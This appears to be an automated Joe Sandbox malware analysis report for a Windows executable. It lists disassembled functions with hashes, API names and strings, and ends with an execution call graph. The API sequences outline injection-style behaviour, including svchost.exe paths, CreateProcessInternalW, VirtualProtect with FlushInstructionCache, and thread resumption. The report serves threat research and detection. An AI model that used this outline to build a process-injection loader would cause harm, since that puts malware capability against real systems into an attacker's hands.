                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: @$IsWow64Process$kernel32
                                                                                        • API String ID: 1646373207-1447682865
                                                                                        • Opcode ID: ab93a9697e7db49f45cab12df12d8e20f72fdeb3fe900da885d9202ed212137f
                                                                                        • Instruction ID: bebd1a57cd8f57502df7cc97ab302c4261441e1b36f2b909865424377143d15f
                                                                                        • Opcode Fuzzy Hash: ab93a9697e7db49f45cab12df12d8e20f72fdeb3fe900da885d9202ed212137f
                                                                                        • Instruction Fuzzy Hash: E401EC6190C65682E734EF71F48437AA7E0FB84F49F941174D68E46698CF7CD549CB10
                                                                                        Function 00007FF795D3F758 Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                        • String ID:
                                                                                        • API String ID: 2998201375-0
                                                                                        • Opcode ID: 5223744fd3fccca467624dc8a192276cd82e61384c6ea2980f54dffe725d773f
                                                                                        • Instruction ID: 45aeff78283b1eba6532229f5e1a655493337f497188cb3cb6851d80a9c76ddd
                                                                                        • Opcode Fuzzy Hash: 5223744fd3fccca467624dc8a192276cd82e61384c6ea2980f54dffe725d773f
                                                                                        • Instruction Fuzzy Hash: 0241D372A0879686EB74AF2599C0139EBE1FF84F88F585131EA8C47B95CF3CD8818710
                                                                                        Function 00007FF795D312F4 Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                        • String ID:
                                                                                        • API String ID: 2850635065-0
                                                                                        • Opcode ID: 0e751263ca790cefd0de29730052997415424a4d3fcfa03dfa405769945a3833
                                                                                        • Instruction ID: 777ada07f5afce6b0a45e906ed80a3886b6e26170e5b3be0548c80a074366fa0
                                                                                        • Opcode Fuzzy Hash: 0e751263ca790cefd0de29730052997415424a4d3fcfa03dfa405769945a3833
                                                                                        • Instruction Fuzzy Hash: 22110361A1C65286E770AB60F4C832AE7E0FB84BA8F845335E59E429ACDF3CD545CB10
                                                                                        Function 00007FF795D329AC Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: _getptd$_inconsistency$DecodePointer_getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 3566995948-0
                                                                                        • Opcode ID: ee8c12c8554f5530bc3b28713b5296e1af5c1cc8e122cf2103e50e6ee38f58da
                                                                                        • Instruction ID: 2e9031bf5ac88e9e82e4668897bad2755a43ac7f8b569b37e1d43039c012befe
                                                                                        • Opcode Fuzzy Hash: ee8c12c8554f5530bc3b28713b5296e1af5c1cc8e122cf2103e50e6ee38f58da
                                                                                        • Instruction Fuzzy Hash: 08F0D022E09592D0EA717B75E0C11BC96E4AF59FD8FCC6171D64D07286AE39E5908334
                                                                                        Function 00007FF795D31590 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _callnewh.LIBCMT ref: 00007FF795D3159E
                                                                                        • malloc.LIBCMT ref: 00007FF795D315AA
                                                                                          • Part of subcall function 00007FF795D3244C: _FF_MSGBANNER.LIBCMT ref: 00007FF795D3247C
                                                                                          • Part of subcall function 00007FF795D3244C: _NMSG_WRITE.LIBCMT ref: 00007FF795D32486
                                                                                          • Part of subcall function 00007FF795D3244C: HeapAlloc.KERNEL32(?,?,00000000,00007FF795D34284,?,?,?,00007FF795D3AD9C,?,?,?,00007FF795D3AC9B,?,?,00000000,00007FF795D35832), ref: 00007FF795D324A1
                                                                                          • Part of subcall function 00007FF795D3244C: _callnewh.LIBCMT ref: 00007FF795D324BA
                                                                                          • Part of subcall function 00007FF795D3244C: _errno.LIBCMT ref: 00007FF795D324C5
                                                                                          • Part of subcall function 00007FF795D3244C: _errno.LIBCMT ref: 00007FF795D324D0
                                                                                        • _CxxThrowException.LIBCMT ref: 00007FF795D315F3
                                                                                          • Part of subcall function 00007FF795D32504: RtlPcToFileHeader.NTDLL ref: 00007FF795D32593
                                                                                          • Part of subcall function 00007FF795D32504: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF795D404BE), ref: 00007FF795D325D2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
                                                                                        • String ID: bad allocation
                                                                                        • API String ID: 1214304046-2104205924
                                                                                        • Opcode ID: 3b8e8bd193397a22c989b775499798885fd0ff8c1caff98f5e3a105427b3f2ea
                                                                                        • Instruction ID: 075905c456604fee3f06dbe24585eb47e4ad9de53685c6ece6dfbc0b520c3ca4
                                                                                        • Opcode Fuzzy Hash: 3b8e8bd193397a22c989b775499798885fd0ff8c1caff98f5e3a105427b3f2ea
                                                                                        • Instruction Fuzzy Hash: 29017025E08B5780EA34ABA2A4D11B8D3E4AF45BC8F886030D94D0779ADE3CE155C710
                                                                                        Function 00007FF795D456A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                        • String ID: csm
                                                                                        • API String ID: 2821275340-1018135373
                                                                                        • Opcode ID: c927b15099e8d8d8a14847beea8bde30514249613e58caf7d211df8e6c6ec09d
                                                                                        • Instruction ID: 6d8f970fc2f60f6c65609657560cca40a2a965f90ae774f2aa35ad3a5bc84123
                                                                                        • Opcode Fuzzy Hash: c927b15099e8d8d8a14847beea8bde30514249613e58caf7d211df8e6c6ec09d
                                                                                        • Instruction Fuzzy Hash: D6012C67D4469289DB70FF3598C12BC63E4EB65F99F842071DE4D4A686DE38D880C310
                                                                                        Function 00007FF795D122BC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentExpandStrings
                                                                                        • String ID: %SystemRoot%\SysWoW64\svchost.exe$%SystemRoot%\system32\svchost.exe
                                                                                        • API String ID: 237503144-2871004979
                                                                                        • Opcode ID: 26d235ddc8eb93f07edcb8965c1cf58c0c2aab6b495efb37e2acaf60aadbeeb9
                                                                                        • Instruction ID: 1b3d6cbf4f124bddf99dde3f333bfd1f663dced54e0ce8175b04f47a6d9c0754
                                                                                        • Opcode Fuzzy Hash: 26d235ddc8eb93f07edcb8965c1cf58c0c2aab6b495efb37e2acaf60aadbeeb9
                                                                                        • Instruction Fuzzy Hash: D3F08261A2D5A2C1D724EF32F48003EFBB0F795B80F802474E58A03AA8CE2DD541CF20
                                                                                        Function 00007FF795D11088 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: GetThreadId$kernel32
                                                                                        • API String ID: 1646373207-2383230424
                                                                                        • Opcode ID: e461afaf8c1bd09b320089634cf66b20fcf42d2cd2d08406a6f8b5433de6df5f
                                                                                        • Instruction ID: e984025ddd69d87db78cdfd2e4b7f8b0279ecf59ff8902cec9bc48b4e7535e18
                                                                                        • Opcode Fuzzy Hash: e461afaf8c1bd09b320089634cf66b20fcf42d2cd2d08406a6f8b5433de6df5f
                                                                                        • Instruction Fuzzy Hash: 85E0C921918A9282D734AF70F884339A3E0FB84B85FD01570D58E426A4DF2CD589CB10
                                                                                        Function 00007FF795D11600 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: CreateProcessInternalW$kernel32
                                                                                        • API String ID: 1646373207-4069603262
                                                                                        • Opcode ID: d95c6e7916faab0d17594eb83d8a00f0299812b173539474de4610889b1bf182
                                                                                        • Instruction ID: 502b2d29203be3be04b24c5bebf738d3630f1374a68ae026981f7ed2b718c9bd
                                                                                        • Opcode Fuzzy Hash: d95c6e7916faab0d17594eb83d8a00f0299812b173539474de4610889b1bf182
                                                                                        • Instruction Fuzzy Hash: 51E09A25E19A6282E730FF34F884375A3E0BB54B91FC06575C49F422A4DF6DE599C720
                                                                                        Function 00007FF795D2BCD8 Relevance: 6.1, APIs: 4, Instructions: 121COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: Mtx_guardMtx_guard::~_$char_traits
                                                                                        • String ID:
                                                                                        • API String ID: 1723400902-0
                                                                                        • Opcode ID: 3577689191e647b2eba0244f68066ee36e99a69f77505bdd8bbac9a00180cfdb
                                                                                        • Instruction ID: a4c3152964f1778ac8826256f2b9ca2a28b8ae9301c0f7104c6b35c9f46f74cd
                                                                                        • Opcode Fuzzy Hash: 3577689191e647b2eba0244f68066ee36e99a69f77505bdd8bbac9a00180cfdb
                                                                                        • Instruction Fuzzy Hash: 7A51C076A1CB9582DA14EB6AF48026EF7A1F7C5B84F501136EB8D47B69DF3CE0418B10
                                                                                        Function 00007FF795D400B0 Relevance: 6.1, APIs: 4, Instructions: 76COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharErrorLastMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 203985260-0
                                                                                        • Opcode ID: cc073f878938fc799904678768523023e3297de0d63febdb3c1fef3ad7fee24c
                                                                                        • Instruction ID: b1309de488301c1d4d472c9cd797c1d3e83099ddf743d67822a2468dc0fb8566
                                                                                        • Opcode Fuzzy Hash: cc073f878938fc799904678768523023e3297de0d63febdb3c1fef3ad7fee24c
                                                                                        • Instruction Fuzzy Hash: CF31683160979283E730AF31648017AB6D5FB80FA4F545778DA9946BE4DF3CD0518760
                                                                                        Function 00007FF795D17DF4 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: shared_ptr$allocator
                                                                                        • String ID:
                                                                                        • API String ID: 426846764-0
                                                                                        • Opcode ID: 46d84b3b4c7e8204a3866c78015af3c28403f43d119607c22453800ec736fa57
                                                                                        • Instruction ID: 160e5d43fb89236b849e799436b8967a2276fa5d79af7528d741ac09336d0c37
                                                                                        • Opcode Fuzzy Hash: 46d84b3b4c7e8204a3866c78015af3c28403f43d119607c22453800ec736fa57
                                                                                        • Instruction Fuzzy Hash: 8B01FE7690CB5681EA24EB35E48006AA7A1FBC4B80F905132EACD47769CE2CE591CB50
                                                                                        Function 00007FF795D17B08 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: shared_ptr$allocator
                                                                                        • String ID:
                                                                                        • API String ID: 426846764-0
                                                                                        • Opcode ID: aa8f5e9cd53f442f27dac48b976c39207e82458efe65fc0543b9c79fb7a2506d
                                                                                        • Instruction ID: 5e4b3d12a7f41c1fc397352f13918989d14d849758d8a35cede8260d83d4e2b2
                                                                                        • Opcode Fuzzy Hash: aa8f5e9cd53f442f27dac48b976c39207e82458efe65fc0543b9c79fb7a2506d
                                                                                        • Instruction Fuzzy Hash: F601DB66A18B9681EA24EB35E49106AA7A1FBC4B80F905131EA8D4776ADF3CE151CB10
                                                                                        Function 00007FF795D18320 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 196COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $$$
                                                                                        • API String ID: 0-233714265
                                                                                        • Opcode ID: bea3f275805cb3c61198a70ac9404b13dde8b97b0dc19bbc96532ad67e767dc4
                                                                                        • Instruction ID: e6c77bf90b385d87df341045836063d0366e2b948a7b233e5601b5963b726849
                                                                                        • Opcode Fuzzy Hash: bea3f275805cb3c61198a70ac9404b13dde8b97b0dc19bbc96532ad67e767dc4
                                                                                        • Instruction Fuzzy Hash: A6A10A3260DAD580DA74EB25E4D03AEB7A0F7C5B84F809832DA8E97B59DE3CD545CB10

                                                                                        Execution Graph

                                                                                        Execution Coverage:1.2%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:7.1%
                                                                                        Total number of Nodes:240
                                                                                        Total number of Limit Nodes:11
                                                                                        execution_graph 31506 10a57d20 31507 10a57d51 31506->31507 31508 10a57d59 VirtualProtect 31506->31508 31507->31508 31509 10a57d7e VirtualProtect 31508->31509 31510 10a57d74 31508->31510 31512 10a7c100 31509->31512 31513 10a57ddf FlushInstructionCache 31512->31513 31513->31510 31514 10a58120 31531 10a57e30 31514->31531 31516 10a58272 _DllMainCRTStartup 31543 10a69fd0 31516->31543 31518 10a582a2 31519 10a5814a _DllMainCRTStartup 31519->31516 31536 10a56f00 31519->31536 31523 10a581b2 31524 10a58265 31523->31524 31525 10a581ba 31523->31525 31542 10a57060 VirtualFree VirtualFree 31524->31542 31540 10a57aa0 HeapAlloc realloc 31525->31540 31528 10a581bf 31530 10a581cb 31528->31530 31541 10a57060 VirtualFree VirtualFree 31528->31541 31530->31516 31532 10a57e71 31531->31532 31533 10a57e4d Sleep 31531->31533 31532->31519 31533->31532 31550 10a570e0 GetSystemInfo 31536->31550 31538 10a56f09 31538->31516 31539 10a58630 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry _cftof_l _DllMainCRTStartup 31538->31539 31539->31523 31540->31528 31541->31530 31542->31516 31544 10a69fd9 31543->31544 31545 10a6a174 IsProcessorFeaturePresent 31544->31545 31546 10a69fe4 31544->31546 31547 10a6a18b 31545->31547 31546->31518 31552 10a70d94 RtlCaptureContext RtlLookupFunctionEntry __crtCaptureCurrentContext 31547->31552 31549 10a6a19e 31549->31518 31551 10a57115 _DllMainCRTStartup 31550->31551 31551->31538 31552->31549 31553 10a585b0 31554 10a5861f 31553->31554 31557 10a585bf __termconin 31553->31557 31555 10a58608 HeapFree 31555->31554 31556 10a585d0 OpenThread 31556->31557 31558 10a585ea ResumeThread 31556->31558 31557->31555 31557->31556 31559 10a58603 31557->31559 31558->31557 31559->31555 31560 10a517f0 31604 10a52650 31560->31604 31562 10a51865 31563 10a52650 38 API calls 31562->31563 31564 10a51870 31563->31564 31613 10a696cc 31564->31613 31567 10a51891 lstrcpyA 31568 10a5189d __lc_wcstolc 31567->31568 31569 10a518ba SHGetFolderPathA lstrcatA lstrcatA PathFileExistsA lstrcmpiA 31568->31569 31570 10a519a2 lstrcatA 31569->31570 31571 10a5192a lstrcmpiA 31569->31571 31572 10a519c0 lstrcmpiA 31570->31572 31571->31570 31573 10a5193e lstrcmpiA 31571->31573 31574 10a519d4 31572->31574 31573->31570 31575 10a51952 lstrcmpiA 31573->31575 31576 10a519e3 PathFindFileNameW 31574->31576 31577 10a51a09 _DllMainCRTStartup 31574->31577 31575->31570 31578 10a51966 lstrcmpiA 31575->31578 31576->31577 31630 10a52710 31577->31630 31578->31570 31579 10a5197a lstrcmpiA 31578->31579 31579->31570 31581 10a5198e lstrcmpiA 31579->31581 31581->31570 31581->31572 31582 10a51c0c 31641 10a6968c 36 API calls 2 library calls 31582->31641 31583 10a51a21 31583->31582 31585 10a51a94 31583->31585 31600 10a51ab5 __lc_wcstolc 31585->31600 31639 10a517a0 GetNativeSystemInfo IsWow64Process 31585->31639 31586 10a51c14 31642 10a6968c 36 API calls 2 library calls 31586->31642 31589 10a51c1c 31643 10a6968c 36 API calls 2 library calls 31589->31643 31590 10a51aa3 31593 10a51aa7 31590->31593 31594 10a51ac2 TerminateProcess 31590->31594 31591 10a51ae8 wsprintfA CreateFileA WriteFile WriteFile 31595 10a51c03 __termconin 31591->31595 31596 10a51b7b 6 API calls 31591->31596 31640 10a51370 42 API calls 6 library calls 31593->31640 31594->31600 31595->31582 31596->31595 31597 10a51c24 31644 10a6968c 36 API calls 2 library calls 31597->31644 31600->31591 31601 10a51c2d 31602 10a69fd0 _cftof_l 3 API calls 31601->31602 31603 10a51c3f 31602->31603 31605 10a52666 WideCharToMultiByte 31604->31605 31606 10a5265e 31604->31606 31607 10a526b1 31605->31607 31608 10a5269f 31605->31608 31606->31562 31609 10a696cc malloc 36 API calls 31607->31609 31608->31562 31610 10a526c0 31609->31610 31611 10a526f2 31610->31611 31612 10a526c8 WideCharToMultiByte 31610->31612 31611->31562 31612->31611 31614 10a69760 31613->31614 31621 10a696e4 31613->31621 31651 10a6cc48 DecodePointer 31614->31651 31616 10a69765 31652 10a6b370 36 API calls _getptd_noexit 31616->31652 31617 10a6971c HeapAlloc 31619 10a5187d PathFindFileNameA 31617->31619 31617->31621 31619->31567 31619->31568 31621->31617 31622 10a69745 31621->31622 31626 10a696fc 31621->31626 31627 10a6974a 31621->31627 31648 10a6cc48 DecodePointer 31621->31648 31649 10a6b370 36 API calls _getptd_noexit 31622->31649 31626->31617 31645 10a6c774 36 API calls 2 library calls 31626->31645 31646 10a6c7e8 36 API calls 6 library calls 31626->31646 31647 10a6ccc8 GetProcAddress ExitProcess __crtCorExitProcess 31626->31647 31650 10a6b370 36 API calls _getptd_noexit 31627->31650 31631 10a52724 MultiByteToWideChar 31630->31631 31632 10a527ad 